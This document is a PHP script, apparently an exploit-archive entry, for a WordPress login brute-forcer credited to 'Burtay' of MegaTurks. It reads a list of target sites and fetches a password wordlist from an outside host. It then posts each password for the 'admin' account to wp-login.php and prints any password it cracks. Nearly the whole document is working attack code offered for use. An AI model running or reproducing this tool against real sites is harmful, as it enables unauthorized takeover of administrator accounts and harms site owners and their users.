This tool is a simple WordPress brute forcing utility written in PHP.
826118e911fad728ccfeda726fcedec979d776f67274fb216b25defd0c3b5541
<?php
/*
* MegaTurks Wordpress Brute-Forcer
* Coded By Burtay
* admin@burtay.org (only mail)
* Burtay.org - Megaturks.net
* Speacial Thanks RMx
*/
class wp
{
public $site;
public $password;
public $wordlist;
public $siteler;
public $regex = 'general.php';
public function wordlist()
{
$liste = file_get_contents("http://afrikanhosting.com/images/wp.txt");
$this->wordlist = explode("\n",$liste);
return $this->wordlist;
}
public function curl($site,$password)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/wp-login.php");
curl_setopt($curl,CURLOPT_COOKIEJAR,"megaturks.dat");
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=".$password."&redirect_to=".$site."/wp-admin/&testcookie=1");
$calis = curl_exec($curl);
return $calis;
}
public function siteler($liste)
{
$site = file_get_contents($liste);
$this->siteler = explode("\n",$site);
return $this->siteler;
}
public function burtay($liste)
{
$this->siteler($liste);
foreach($this->siteler as $sites)
{
$site = trim($sites);
echo "Denenen Site : " . $site . "\n";
foreach($this->wordlist() as $sifre)
{
$password = trim($sifre);
echo "Denenen Sifre " . $password . "\n";
if ( eregi ($this->regex,$this->curl($site,$password)) )
{
echo "-------------------------------------\n";
echo $site . " icin sifre kirildi sifre : " . $password . "\n" ;
echo "Coded By Burtay\n";
echo "Special Thanks RMx\n";
echo "-------------------------------------\n";
break;
}
}
}
}
}
echo "
------------------
MegaTurks.Net ||
Coded By Burtay ||
------------------
\n\n
";
$class = new wp();
$class->burtay($argv[1]);
?>